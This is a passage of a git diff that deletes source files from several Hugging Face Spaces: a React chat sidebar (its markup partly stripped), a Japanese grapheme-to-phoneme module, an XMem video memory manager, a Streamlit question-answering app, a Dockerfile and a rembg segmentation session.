SettingsIcon from "../icons/settings.svg"; -import GithubIcon from "../icons/github.svg"; -import ChatGptIcon from "../icons/chatgpt.svg"; -import AddIcon from "../icons/add.svg"; -import CloseIcon from "../icons/close.svg"; -import MaskIcon from "../icons/mask.svg"; -import PluginIcon from "../icons/plugin.svg"; - -import Locale from "../locales"; - -import { useAppConfig, useChatStore } from "../store"; - -import { - MAX_SIDEBAR_WIDTH, - MIN_SIDEBAR_WIDTH, - NARROW_SIDEBAR_WIDTH, - Path, - REPO_URL, -} from "../constant"; - -import { Link, useNavigate } from "react-router-dom"; -import { useMobileScreen } from "../utils"; -import dynamic from "next/dynamic"; -import { showToast } from "./ui-lib"; - -const ChatList = dynamic(async () => (await import("./chat-list")).ChatList, { - loading: () => null, -}); - -function useHotKey() { - const chatStore = useChatStore(); - - useEffect(() => { - const onKeyDown = (e: KeyboardEvent) => { - if (e.metaKey || e.altKey || e.ctrlKey) { - const n = chatStore.sessions.length; - const limit = (x: number) => (x + n) % n; - const i = chatStore.currentSessionIndex; - if (e.key === "ArrowUp") { - chatStore.selectSession(limit(i - 1)); - } else if (e.key === "ArrowDown") { - chatStore.selectSession(limit(i + 1)); - } - } - }; - - window.addEventListener("keydown", onKeyDown); - return () => window.removeEventListener("keydown", onKeyDown); - }); -} - -function useDragSideBar() { - const limit = (x: number) => Math.min(MAX_SIDEBAR_WIDTH, x); - - const config = useAppConfig(); - const startX = useRef(0); - const startDragWidth = useRef(config.sidebarWidth ?? 300); - const lastUpdateTime = useRef(Date.now()); - - const handleMouseMove = useRef((e: MouseEvent) => { - if (Date.now() < lastUpdateTime.current + 50) { - return; - } - lastUpdateTime.current = Date.now(); - const d = e.clientX - startX.current; - const nextWidth = limit(startDragWidth.current + d); - config.update((config) => (config.sidebarWidth = nextWidth)); - }); - - const handleMouseUp = useRef(() => { - startDragWidth.current = config.sidebarWidth ?? 300; - window.removeEventListener("mousemove", handleMouseMove.current); - window.removeEventListener("mouseup", handleMouseUp.current); - }); - - const onDragMouseDown = (e: MouseEvent) => { - startX.current = e.clientX; - - window.addEventListener("mousemove", handleMouseMove.current); - window.addEventListener("mouseup", handleMouseUp.current); - }; - const isMobileScreen = useMobileScreen(); - const shouldNarrow = - !isMobileScreen && config.sidebarWidth < MIN_SIDEBAR_WIDTH; - - useEffect(() => { - const barWidth = shouldNarrow - ? NARROW_SIDEBAR_WIDTH - : limit(config.sidebarWidth ?? 300); - const sideBarWidth = isMobileScreen ? "100vw" : `${barWidth}px`; - document.documentElement.style.setProperty("--sidebar-width", sideBarWidth); - }, [config.sidebarWidth, isMobileScreen, shouldNarrow]); - - return { - onDragMouseDown, - shouldNarrow, - }; -} - -export function SideBar(props: { className?: string }) { - const chatStore = useChatStore(); - - // drag side bar - const { onDragMouseDown, shouldNarrow } = useDragSideBar(); - const navigate = useNavigate(); - - const config = useAppConfig(); - useHotKey(); - - return ( -
    -
    -
    - ChatGPT Next【{config.bot}】 -
    -
    必应暂不支持上下文
    -
    - -
    -
    - -
    - } - text={shouldNarrow ? undefined : Locale.Mask.Name} - className={styles["sidebar-bar-button"]} - onClick={() => navigate(Path.NewChat, { state: { fromHome: true } })} - shadow - /> - } - text={shouldNarrow ? undefined : Locale.Plugin.Name} - className={styles["sidebar-bar-button"]} - onClick={() => showToast(Locale.WIP)} - shadow - /> -
    - -
    { - if (e.target === e.currentTarget) { - navigate(Path.Home); - } - }} - > - -
    - -
    -
    -
    - } - onClick={() => { - if (confirm(Locale.Home.DeleteChat)) { - chatStore.deleteSession(chatStore.currentSessionIndex); - } - }} - /> -
    -
    - - } shadow /> - -
    - -
    -
    - } - text={shouldNarrow ? undefined : Locale.Home.NewChat} - onClick={() => { - if (config.dontShowMaskSplashScreen) { - chatStore.newSession(); - navigate(Path.Chat); - } else { - navigate(Path.NewChat); - } - }} - shadow - /> -
    -
    - -
    onDragMouseDown(e as any)} - >
    -
    - ); -} diff --git a/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py b/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py deleted file mode 100644 index 53db38b7349af5a117f81314304d69796c0daf81..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/BangDream-Bert-VITS2/text/japanese.py +++ /dev/null @@ -1,586 +0,0 @@ -# Convert Japanese text to phonemes which is -# compatible with Julius https://github.com/julius-speech/segmentation-kit -import re -import unicodedata - -from transformers import AutoTokenizer - -from text import punctuation, symbols - -try: - import MeCab -except ImportError as e: - raise ImportError("Japanese requires mecab-python3 and unidic-lite.") from e -from num2words import num2words - -_CONVRULES = [ - # Conversion of 2 letters - "アァ/ a a", - "イィ/ i i", - "イェ/ i e", - "イャ/ y a", - "ウゥ/ u:", - "エェ/ e e", - "オォ/ o:", - "カァ/ k a:", - "キィ/ k i:", - "クゥ/ k u:", - "クャ/ ky a", - "クュ/ ky u", - "クョ/ ky o", - "ケェ/ k e:", - "コォ/ k o:", - "ガァ/ g a:", - "ギィ/ g i:", - "グゥ/ g u:", - "グャ/ gy a", - "グュ/ gy u", - "グョ/ gy o", - "ゲェ/ g e:", - "ゴォ/ g o:", - "サァ/ s a:", - "シィ/ sh i:", - "スゥ/ s u:", - "スャ/ sh a", - "スュ/ sh u", - "スョ/ sh o", - "セェ/ s e:", - "ソォ/ s o:", - "ザァ/ z a:", - "ジィ/ j i:", - "ズゥ/ z u:", - "ズャ/ zy a", - "ズュ/ zy u", - "ズョ/ zy o", - "ゼェ/ z e:", - "ゾォ/ z o:", - "タァ/ t a:", - "チィ/ ch i:", - "ツァ/ ts a", - "ツィ/ ts i", - "ツゥ/ ts u:", - "ツャ/ ch a", - "ツュ/ ch u", - "ツョ/ ch o", - "ツェ/ ts e", - "ツォ/ ts o", - "テェ/ t e:", - "トォ/ t o:", - "ダァ/ d a:", - "ヂィ/ j i:", - "ヅゥ/ d u:", - "ヅャ/ zy a", - "ヅュ/ zy u", - "ヅョ/ zy o", - "デェ/ d e:", - "ドォ/ d o:", - "ナァ/ n a:", - "ニィ/ n i:", - "ヌゥ/ n u:", - "ヌャ/ ny a", - "ヌュ/ ny u", - "ヌョ/ ny o", - "ネェ/ n e:", - "ノォ/ n o:", - "ハァ/ h a:", - "ヒィ/ h i:", - "フゥ/ f u:", - "フャ/ hy a", - "フュ/ hy u", - "フョ/ hy o", - "ヘェ/ h e:", - "ホォ/ h o:", - "バァ/ b a:", - "ビィ/ b i:", - "ブゥ/ b u:", - "フャ/ hy a", - "ブュ/ by u", - "フョ/ hy o", - "ベェ/ b e:", - "ボォ/ b o:", - "パァ/ p a:", - "ピィ/ p i:", - "プゥ/ p u:", - "プャ/ py a", - "プュ/ py u", - "プョ/ py o", - "ペェ/ p e:", - "ポォ/ p o:", - "マァ/ m a:", - "ミィ/ m i:", - "ムゥ/ m u:", - "ムャ/ my a", - "ムュ/ my u", - "ムョ/ my o", - "メェ/ m e:", - "モォ/ m o:", - "ヤァ/ y a:", - "ユゥ/ y u:", - "ユャ/ y a:", - "ユュ/ y u:", - "ユョ/ y o:", - "ヨォ/ y o:", - "ラァ/ r a:", - "リィ/ r i:", - "ルゥ/ r u:", - "ルャ/ ry a", - "ルュ/ ry u", - "ルョ/ ry o", - "レェ/ r e:", - "ロォ/ r o:", - "ワァ/ w a:", - "ヲォ/ o:", - "ディ/ d i", - "デェ/ d e:", - "デャ/ dy a", - "デュ/ dy u", - "デョ/ dy o", - "ティ/ t i", - "テェ/ t e:", - "テャ/ ty a", - "テュ/ ty u", - "テョ/ ty o", - "スィ/ s i", - "ズァ/ z u a", - "ズィ/ z i", - "ズゥ/ z u", - "ズャ/ zy a", - "ズュ/ zy u", - "ズョ/ zy o", - "ズェ/ z e", - "ズォ/ z o", - "キャ/ ky a", - "キュ/ ky u", - "キョ/ ky o", - "シャ/ sh a", - "シュ/ sh u", - "シェ/ sh e", - "ショ/ sh o", - "チャ/ ch a", - "チュ/ ch u", - "チェ/ ch e", - "チョ/ ch o", - "トゥ/ t u", - "トャ/ ty a", - "トュ/ ty u", - "トョ/ ty o", - "ドァ/ d o a", - "ドゥ/ d u", - "ドャ/ dy a", - "ドュ/ dy u", - "ドョ/ dy o", - "ドォ/ d o:", - "ニャ/ ny a", - "ニュ/ ny u", - "ニョ/ ny o", - "ヒャ/ hy a", - "ヒュ/ hy u", - "ヒョ/ hy o", - "ミャ/ my a", - "ミュ/ my u", - "ミョ/ my o", - "リャ/ ry a", - "リュ/ ry u", - "リョ/ ry o", - "ギャ/ gy a", - "ギュ/ gy u", - "ギョ/ gy o", - "ヂェ/ j e", - "ヂャ/ j a", - "ヂュ/ j u", - "ヂョ/ j o", - "ジェ/ j e", - "ジャ/ j a", - "ジュ/ j u", - "ジョ/ j o", - "ビャ/ by a", - "ビュ/ by u", - "ビョ/ by o", - "ピャ/ py a", - "ピュ/ py u", - "ピョ/ py o", - "ウァ/ u a", - "ウィ/ w i", - "ウェ/ w e", - "ウォ/ w o", - "ファ/ f a", - "フィ/ f i", - "フゥ/ f u", - "フャ/ hy a", - "フュ/ hy u", - "フョ/ hy o", - "フェ/ f e", - "フォ/ f o", - "ヴァ/ b a", - "ヴィ/ b i", - "ヴェ/ b e", - "ヴォ/ b o", - "ヴュ/ by u", - # Conversion of 1 letter - "ア/ a", - "イ/ i", - "ウ/ u", - "エ/ e", - "オ/ o", - "カ/ k a", - "キ/ k i", - "ク/ k u", - "ケ/ k e", - "コ/ k o", - "サ/ s a", - "シ/ sh i", - "ス/ s u", - "セ/ s e", - "ソ/ s o", - "タ/ t a", - "チ/ ch i", - "ツ/ ts u", - "テ/ t e", - "ト/ t o", - "ナ/ n a", - "ニ/ n i", - "ヌ/ n u", - "ネ/ n e", - "ノ/ n o", - "ハ/ h a", - "ヒ/ h i", - "フ/ f u", - "ヘ/ h e", - "ホ/ h o", - "マ/ m a", - "ミ/ m i", - "ム/ m u", - "メ/ m e", - "モ/ m o", - "ラ/ r a", - "リ/ r i", - "ル/ r u", - "レ/ r e", - "ロ/ r o", - "ガ/ g a", - "ギ/ g i", - "グ/ g u", - "ゲ/ g e", - "ゴ/ g o", - "ザ/ z a", - "ジ/ j i", - "ズ/ z u", - "ゼ/ z e", - "ゾ/ z o", - "ダ/ d a", - "ヂ/ j i", - "ヅ/ z u", - "デ/ d e", - "ド/ d o", - "バ/ b a", - "ビ/ b i", - "ブ/ b u", - "ベ/ b e", - "ボ/ b o", - "パ/ p a", - "ピ/ p i", - "プ/ p u", - "ペ/ p e", - "ポ/ p o", - "ヤ/ y a", - "ユ/ y u", - "ヨ/ y o", - "ワ/ w a", - "ヰ/ i", - "ヱ/ e", - "ヲ/ o", - "ン/ N", - "ッ/ q", - "ヴ/ b u", - "ー/:", - # Try converting broken text - "ァ/ a", - "ィ/ i", - "ゥ/ u", - "ェ/ e", - "ォ/ o", - "ヮ/ w a", - "ォ/ o", - # Symbols - "、/ ,", - "。/ .", - "!/ !", - "?/ ?", - "・/ ,", -] - -_COLON_RX = re.compile(":+") -_REJECT_RX = re.compile("[^ a-zA-Z:,.?]") - - -def _makerulemap(): - l = [tuple(x.split("/")) for x in _CONVRULES] - return tuple({k: v for k, v in l if len(k) == i} for i in (1, 2)) - - -_RULEMAP1, _RULEMAP2 = _makerulemap() - - -def kata2phoneme(text: str) -> str: - """Convert katakana text to phonemes.""" - text = text.strip() - res = [] - while text: - if len(text) >= 2: - x = _RULEMAP2.get(text[:2]) - if x is not None: - text = text[2:] - res += x.split(" ")[1:] - continue - x = _RULEMAP1.get(text[0]) - if x is not None: - text = text[1:] - res += x.split(" ")[1:] - continue - res.append(text[0]) - text = text[1:] - # res = _COLON_RX.sub(":", res) - return res - - -_KATAKANA = "".join(chr(ch) for ch in range(ord("ァ"), ord("ン") + 1)) -_HIRAGANA = "".join(chr(ch) for ch in range(ord("ぁ"), ord("ん") + 1)) -_HIRA2KATATRANS = str.maketrans(_HIRAGANA, _KATAKANA) - - -def hira2kata(text: str) -> str: - text = text.translate(_HIRA2KATATRANS) - return text.replace("う゛", "ヴ") - - -_SYMBOL_TOKENS = set(list("・、。?!")) -_NO_YOMI_TOKENS = set(list("「」『』―()[][]")) -_TAGGER = MeCab.Tagger() - - -def text2kata(text: str) -> str: - parsed = _TAGGER.parse(text) - res = [] - for line in parsed.split("\n"): - if line == "EOS": - break - parts = line.split("\t") - - word, yomi = parts[0], parts[1] - if yomi: - res.append(yomi) - else: - if word in _SYMBOL_TOKENS: - res.append(word) - elif word in ("っ", "ッ"): - res.append("ッ") - elif word in _NO_YOMI_TOKENS: - pass - else: - res.append(word) - return hira2kata("".join(res)) - - -_ALPHASYMBOL_YOMI = { - "#": "シャープ", - "%": "パーセント", - "&": "アンド", - "+": "プラス", - "-": "マイナス", - ":": "コロン", - ";": "セミコロン", - "<": "小なり", - "=": "イコール", - ">": "大なり", - "@": "アット", - "a": "エー", - "b": "ビー", - "c": "シー", - "d": "ディー", - "e": "イー", - "f": "エフ", - "g": "ジー", - "h": "エイチ", - "i": "アイ", - "j": "ジェー", - "k": "ケー", - "l": "エル", - "m": "エム", - "n": "エヌ", - "o": "オー", - "p": "ピー", - "q": "キュー", - "r": "アール", - "s": "エス", - "t": "ティー", - "u": "ユー", - "v": "ブイ", - "w": "ダブリュー", - "x": "エックス", - "y": "ワイ", - "z": "ゼット", - "α": "アルファ", - "β": "ベータ", - "γ": "ガンマ", - "δ": "デルタ", - "ε": "イプシロン", - "ζ": "ゼータ", - "η": "イータ", - "θ": "シータ", - "ι": "イオタ", - "κ": "カッパ", - "λ": "ラムダ", - "μ": "ミュー", - "ν": "ニュー", - "ξ": "クサイ", - "ο": "オミクロン", - "π": "パイ", - "ρ": "ロー", - "σ": "シグマ", - "τ": "タウ", - "υ": "ウプシロン", - "φ": "ファイ", - "χ": "カイ", - "ψ": "プサイ", - "ω": "オメガ", -} - - -_NUMBER_WITH_SEPARATOR_RX = re.compile("[0-9]{1,3}(,[0-9]{3})+") -_CURRENCY_MAP = {"$": "ドル", "¥": "円", "£": "ポンド", "€": "ユーロ"} -_CURRENCY_RX = re.compile(r"([$¥£€])([0-9.]*[0-9])") -_NUMBER_RX = re.compile(r"[0-9]+(\.[0-9]+)?") - - -def japanese_convert_numbers_to_words(text: str) -> str: - res = _NUMBER_WITH_SEPARATOR_RX.sub(lambda m: m[0].replace(",", ""), text) - res = _CURRENCY_RX.sub(lambda m: m[2] + _CURRENCY_MAP.get(m[1], m[1]), res) - res = _NUMBER_RX.sub(lambda m: num2words(m[0], lang="ja"), res) - return res - - -def japanese_convert_alpha_symbols_to_words(text: str) -> str: - return "".join([_ALPHASYMBOL_YOMI.get(ch, ch) for ch in text.lower()]) - - -def japanese_text_to_phonemes(text: str) -> str: - """Convert Japanese text to phonemes.""" - res = unicodedata.normalize("NFKC", text) - res = japanese_convert_numbers_to_words(res) - # res = japanese_convert_alpha_symbols_to_words(res) - res = text2kata(res) - res = kata2phoneme(res) - return res - - -def is_japanese_character(char): - # 定义日语文字系统的 Unicode 范围 - japanese_ranges = [ - (0x3040, 0x309F), # 平假名 - (0x30A0, 0x30FF), # 片假名 - (0x4E00, 0x9FFF), # 汉字 (CJK Unified Ideographs) - (0x3400, 0x4DBF), # 汉字扩展 A - (0x20000, 0x2A6DF), # 汉字扩展 B - # 可以根据需要添加其他汉字扩展范围 - ] - - # 将字符的 Unicode 编码转换为整数 - char_code = ord(char) - - # 检查字符是否在任何一个日语范围内 - for start, end in japanese_ranges: - if start <= char_code <= end: - return True - - return False - - -rep_map = { - ":": ",", - ";": ",", - ",": ",", - "。": ".", - "!": "!", - "?": "?", - "\n": ".", - "·": ",", - "、": ",", - "...": "…", -} - - -def replace_punctuation(text): - pattern = re.compile("|".join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub( - r"[^\u3040-\u309F\u30A0-\u30FF\u4E00-\u9FFF\u3400-\u4DBF" - + "".join(punctuation) - + r"]+", - "", - replaced_text, - ) - - return replaced_text - - -def text_normalize(text): - res = unicodedata.normalize("NFKC", text) - res = japanese_convert_numbers_to_words(res) - # res = "".join([i for i in res if is_japanese_character(i)]) - res = replace_punctuation(res) - return res - - -def distribute_phone(n_phone, n_word): - phones_per_word = [0] * n_word - for task in range(n_phone): - min_tasks = min(phones_per_word) - min_index = phones_per_word.index(min_tasks) - phones_per_word[min_index] += 1 - return phones_per_word - - -tokenizer = AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - - -def g2p(norm_text): - tokenized = tokenizer.tokenize(norm_text) - phs = [] - ph_groups = [] - for t in tokenized: - if not t.startswith("#"): - ph_groups.append([t]) - else: - ph_groups[-1].append(t.replace("#", "")) - word2ph = [] - for group in ph_groups: - phonemes = kata2phoneme(text2kata("".join(group))) - # phonemes = [i for i in phonemes if i in symbols] - for i in phonemes: - assert i in symbols, (group, norm_text, tokenized) - phone_len = len(phonemes) - word_len = len(group) - - aaa = distribute_phone(phone_len, word_len) - word2ph += aaa - - phs += phonemes - phones = ["_"] + phs + ["_"] - tones = [0 for i in phones] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -if __name__ == "__main__": - tokenizer = AutoTokenizer.from_pretrained("./bert/bert-base-japanese-v3") - text = "hello,こんにちは、世界!……" - from text.japanese_bert import get_bert_feature - - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) diff --git a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py b/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py deleted file mode 100644 index abae24349cb61b4e7e07588375a409254302ab08..0000000000000000000000000000000000000000 --- a/spaces/Make-A-Protagonist/Make-A-Protagonist-inference/Make-A-Protagonist/experts/XMem/inference/memory_manager.py +++ /dev/null @@ -1,284 +0,0 @@ -import torch -import warnings - -from XMem.inference.kv_memory_store import KeyValueMemoryStore -from XMem.model.memory_util import * - - -class MemoryManager: - """ - Manages all three memory stores and the transition between working/long-term memory - """ - def __init__(self, config): - self.hidden_dim = config['hidden_dim'] - self.top_k = config['top_k'] - - self.enable_long_term = config['enable_long_term'] - self.enable_long_term_usage = config['enable_long_term_count_usage'] - if self.enable_long_term: - self.max_mt_frames = config['max_mid_term_frames'] - self.min_mt_frames = config['min_mid_term_frames'] - self.num_prototypes = config['num_prototypes'] - self.max_long_elements = config['max_long_term_elements'] - - # dimensions will be inferred from input later - self.CK = self.CV = None - self.H = self.W = None - - # The hidden state will be stored in a single tensor for all objects - # B x num_objects x CH x H x W - self.hidden = None - - self.work_mem = KeyValueMemoryStore(count_usage=self.enable_long_term) - if self.enable_long_term: - self.long_mem = KeyValueMemoryStore(count_usage=self.enable_long_term_usage) - - self.reset_config = True - - def update_config(self, config): - self.reset_config = True - self.hidden_dim = config['hidden_dim'] - self.top_k = config['top_k'] - - assert self.enable_long_term == config['enable_long_term'], 'cannot update this' - assert self.enable_long_term_usage == config['enable_long_term_count_usage'], 'cannot update this' - - self.enable_long_term_usage = config['enable_long_term_count_usage'] - if self.enable_long_term: - self.max_mt_frames = config['max_mid_term_frames'] - self.min_mt_frames = config['min_mid_term_frames'] - self.num_prototypes = config['num_prototypes'] - self.max_long_elements = config['max_long_term_elements'] - - def _readout(self, affinity, v): - # this function is for a single object group - return v @ affinity - - def match_memory(self, query_key, selection): - # query_key: B x C^k x H x W - # selection: B x C^k x H x W - num_groups = self.work_mem.num_groups - h, w = query_key.shape[-2:] - - query_key = query_key.flatten(start_dim=2) - selection = selection.flatten(start_dim=2) if selection is not None else None - - """ - Memory readout using keys - """ - - if self.enable_long_term and self.long_mem.engaged(): - # Use long-term memory - long_mem_size = self.long_mem.size - memory_key = torch.cat([self.long_mem.key, self.work_mem.key], -1) - shrinkage = torch.cat([self.long_mem.shrinkage, self.work_mem.shrinkage], -1) - - similarity = get_similarity(memory_key, shrinkage, query_key, selection) - work_mem_similarity = similarity[:, long_mem_size:] - long_mem_similarity = similarity[:, :long_mem_size] - - # get the usage with the first group - # the first group always have all the keys valid - affinity, usage = do_softmax( - torch.cat([long_mem_similarity[:, -self.long_mem.get_v_size(0):], work_mem_similarity], 1), - top_k=self.top_k, inplace=True, return_usage=True) - affinity = [affinity] - - # compute affinity group by group as later groups only have a subset of keys - for gi in range(1, num_groups): - if gi < self.long_mem.num_groups: - # merge working and lt similarities before softmax - affinity_one_group = do_softmax( - torch.cat([long_mem_similarity[:, -self.long_mem.get_v_size(gi):], - work_mem_similarity[:, -self.work_mem.get_v_size(gi):]], 1), - top_k=self.top_k, inplace=True) - else: - # no long-term memory for this group - affinity_one_group = do_softmax(work_mem_similarity[:, -self.work_mem.get_v_size(gi):], - top_k=self.top_k, inplace=(gi==num_groups-1)) - affinity.append(affinity_one_group) - - all_memory_value = [] - for gi, gv in enumerate(self.work_mem.value): - # merge the working and lt values before readout - if gi < self.long_mem.num_groups: - all_memory_value.append(torch.cat([self.long_mem.value[gi], self.work_mem.value[gi]], -1)) - else: - all_memory_value.append(gv) - - """ - Record memory usage for working and long-term memory - """ - # ignore the index return for long-term memory - work_usage = usage[:, long_mem_size:] - self.work_mem.update_usage(work_usage.flatten()) - - if self.enable_long_term_usage: - # ignore the index return for working memory - long_usage = usage[:, :long_mem_size] - self.long_mem.update_usage(long_usage.flatten()) - else: - # No long-term memory - similarity = get_similarity(self.work_mem.key, self.work_mem.shrinkage, query_key, selection) - - if self.enable_long_term: - affinity, usage = do_softmax(similarity, inplace=(num_groups==1), - top_k=self.top_k, return_usage=True) - - # Record memory usage for working memory - self.work_mem.update_usage(usage.flatten()) - else: - affinity = do_softmax(similarity, inplace=(num_groups==1), - top_k=self.top_k, return_usage=False) - - affinity = [affinity] - - # compute affinity group by group as later groups only have a subset of keys - for gi in range(1, num_groups): - affinity_one_group = do_softmax(similarity[:, -self.work_mem.get_v_size(gi):], - top_k=self.top_k, inplace=(gi==num_groups-1)) - affinity.append(affinity_one_group) - - all_memory_value = self.work_mem.value - - # Shared affinity within each group - all_readout_mem = torch.cat([ - self._readout(affinity[gi], gv) - for gi, gv in enumerate(all_memory_value) - ], 0) - - return all_readout_mem.view(all_readout_mem.shape[0], self.CV, h, w) - - def add_memory(self, key, shrinkage, value, objects, selection=None): - # key: 1*C*H*W - # value: 1*num_objects*C*H*W - # objects contain a list of object indices - if self.H is None or self.reset_config: - self.reset_config = False - self.H, self.W = key.shape[-2:] - self.HW = self.H*self.W - if self.enable_long_term: - # convert from num. frames to num. nodes - self.min_work_elements = self.min_mt_frames*self.HW - self.max_work_elements = self.max_mt_frames*self.HW - - # key: 1*C*N - # value: num_objects*C*N - key = key.flatten(start_dim=2) - shrinkage = shrinkage.flatten(start_dim=2) - value = value[0].flatten(start_dim=2) - - self.CK = key.shape[1] - self.CV = value.shape[1] - - if selection is not None: - if not self.enable_long_term: - warnings.warn('the selection factor is only needed in long-term mode', UserWarning) - selection = selection.flatten(start_dim=2) - - self.work_mem.add(key, value, shrinkage, selection, objects) - - # long-term memory cleanup - if self.enable_long_term: - # Do memory compressed if needed - if self.work_mem.size >= self.max_work_elements: - # Remove obsolete features if needed - if self.long_mem.size >= (self.max_long_elements-self.num_prototypes): - self.long_mem.remove_obsolete_features(self.max_long_elements-self.num_prototypes) - - self.compress_features() - - - def create_hidden_state(self, n, sample_key): - # n is the TOTAL number of objects - h, w = sample_key.shape[-2:] - if self.hidden is None: - self.hidden = torch.zeros((1, n, self.hidden_dim, h, w), device=sample_key.device) - elif self.hidden.shape[1] != n: - self.hidden = torch.cat([ - self.hidden, - torch.zeros((1, n-self.hidden.shape[1], self.hidden_dim, h, w), device=sample_key.device) - ], 1) - - assert(self.hidden.shape[1] == n) - - def set_hidden(self, hidden): - self.hidden = hidden - - def get_hidden(self): - return self.hidden - - def compress_features(self): - HW = self.HW - candidate_value = [] - total_work_mem_size = self.work_mem.size - for gv in self.work_mem.value: - # Some object groups might be added later in the video - # So not all keys have values associated with all objects - # We need to keep track of the key->value validity - mem_size_in_this_group = gv.shape[-1] - if mem_size_in_this_group == total_work_mem_size: - # full LT - candidate_value.append(gv[:,:,HW:-self.min_work_elements+HW]) - else: - # mem_size is smaller than total_work_mem_size, but at least HW - assert HW <= mem_size_in_this_group < total_work_mem_size - if mem_size_in_this_group > self.min_work_elements+HW: - # part of this object group still goes into LT - candidate_value.append(gv[:,:,HW:-self.min_work_elements+HW]) - else: - # this object group cannot go to the LT at all - candidate_value.append(None) - - # perform memory consolidation - prototype_key, prototype_value, prototype_shrinkage = self.consolidation( - *self.work_mem.get_all_sliced(HW, -self.min_work_elements+HW), candidate_value) - - # remove consolidated working memory - self.work_mem.sieve_by_range(HW, -self.min_work_elements+HW, min_size=self.min_work_elements+HW) - - # add to long-term memory - self.long_mem.add(prototype_key, prototype_value, prototype_shrinkage, selection=None, objects=None) - - def consolidation(self, candidate_key, candidate_shrinkage, candidate_selection, usage, candidate_value): - # keys: 1*C*N - # values: num_objects*C*N - N = candidate_key.shape[-1] - - # find the indices with max usage - _, max_usage_indices = torch.topk(usage, k=self.num_prototypes, dim=-1, sorted=True) - prototype_indices = max_usage_indices.flatten() - - # Prototypes are invalid for out-of-bound groups - validity = [prototype_indices >= (N-gv.shape[2]) if gv is not None else None for gv in candidate_value] - - prototype_key = candidate_key[:, :, prototype_indices] - prototype_selection = candidate_selection[:, :, prototype_indices] if candidate_selection is not None else None - - """ - Potentiation step - """ - similarity = get_similarity(candidate_key, candidate_shrinkage, prototype_key, prototype_selection) - - # convert similarity to affinity - # need to do it group by group since the softmax normalization would be different - affinity = [ - do_softmax(similarity[:, -gv.shape[2]:, validity[gi]]) if gv is not None else None - for gi, gv in enumerate(candidate_value) - ] - - # some values can be have all False validity. Weed them out. - affinity = [ - aff if aff is None or aff.shape[-1] > 0 else None for aff in affinity - ] - - # readout the values - prototype_value = [ - self._readout(affinity[gi], gv) if affinity[gi] is not None else None - for gi, gv in enumerate(candidate_value) - ] - - # readout the shrinkage term - prototype_shrinkage = self._readout(affinity[0], candidate_shrinkage) if candidate_shrinkage is not None else None - - return prototype_key, prototype_value, prototype_shrinkage diff --git a/spaces/Martin1998/question_answering/app.py b/spaces/Martin1998/question_answering/app.py deleted file mode 100644 index f3aead718dde376967044c3a2d48aeb8cc62d2ab..0000000000000000000000000000000000000000 --- a/spaces/Martin1998/question_answering/app.py +++ /dev/null @@ -1,45 +0,0 @@ -import streamlit as st -import re - -from transformers import pipeline - - - -st.title("Question - Answering AI App") -st.write("---") -st.write("### Give Content to the AI and quiz it based on the content.") -st.warning("**Powered by AI Language Models...**") - -st.write("---") - -content = st.text_area("Paste your content here...", height=200) - -words = len(re.findall(r'\w+', content)) -st.write("**Number of words in Content is :**", words) - -text = st.text_area("Ask Question here...") - - -st.write("---") - -if st.button("Generate Answer"): - - if words == 0: - - st.write("### Please! Paste Content into input bar.") - - else: - - qa = pipeline("question-answering") - - response = qa( - question = text, - - context= content - ) - - st.info(response['answer']) - -st.write("---") - -st.write("### How was the response???") \ No newline at end of file diff --git a/spaces/Mashir0/pximg/Dockerfile b/spaces/Mashir0/pximg/Dockerfile deleted file mode 100644 index 483ca4ffe3885adae99446fc81f6102c909f3e98..0000000000000000000000000000000000000000 --- a/spaces/Mashir0/pximg/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -# syntax=docker/dockerfile:1 - -FROM node:16-alpine - -WORKDIR /app -COPY . . - -RUN yarn install --production - -CMD ["yarn", "start"] diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py b/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py deleted file mode 100644 index 2f3b849a2b0390a1c4f3f161307d1f1001d22938..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/rembg/sessions/dis.py +++ /dev/null @@ -1,47 +0,0 @@ -import os -from typing import List - -import numpy as np -import pooch -from PIL import Image -from PIL.Image import Image as PILImage - -from .base import BaseSession - - -class DisSession(BaseSession): - def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]: - ort_outs = self.inner_session.run( - None, - self.normalize(img, (0.485, 0.456, 0.406), (1.0, 1.0, 1.0), (1024, 1024)), - ) - - pred = ort_outs[0][:, 0, :, :] - - ma = np.max(pred) - mi = np.min(pred) - - pred = (pred - mi) / (ma - mi) - pred = np.squeeze(pred) - - mask = Image.fromarray((pred * 255).astype("uint8"), mode="L") - mask = mask.resize(img.size, Image.LANCZOS) - - return [mask] - - @classmethod - def download_models(cls, *args, **kwargs): - fname = f"{cls.name()}.onnx" - pooch.retrieve( - "https://github.com/danielgatis/rembg/releases/download/v0.0.0/isnet-general-use.onnx", - "md5:fc16ebd8b0c10d971d3513d564d01e29", - fname=fname, - path=cls.u2net_home(), - progressbar=True, - ) - - return os.path.join(cls.u2net_home(), fname) - - @classmethod - def name(cls, *args, **kwargs): - return "isnet-general-use" diff --git a/spaces/MingGatsby/Grounding_DINO_demo/setup.py b/spaces/MingGatsby/Grounding_DINO_demo/setup.py deleted file mode 100644 index a045b763fb4a4f61bac23b735544a18ffc68d20a..0000000000000000000000000000000000000000 --- a/spaces/MingGatsby/Grounding_DINO_demo/setup.py +++ /dev/null @@ -1,208 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The IDEA Authors. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS 